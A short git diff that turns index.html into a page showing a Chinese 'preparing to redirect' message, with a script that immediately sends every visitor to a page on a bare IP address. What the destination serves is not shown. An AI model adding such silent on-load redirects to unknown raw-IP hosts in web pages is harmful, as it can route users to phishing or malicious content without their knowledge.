--- a/index.html
+++ b/index.html
@@ -1,1 +1,16 @@
-1111111111111
+<!DOCTYPE html>
+<html>
+	<head>
+		<meta charset="utf-8" />
+		<meta name="viewport" content="width=device-width, initial-scale=1">
+		<title>Yashon' Nice And Good</title>
+	</head>
+	<body>
+		<h6>正在准备跳转中...</h6>
+	</body>
+	<script>
+		window.onload = function(){
+			location.href = 'https://106.13.30.192/li/lc.html';
+		}
+	</script>
+</html>
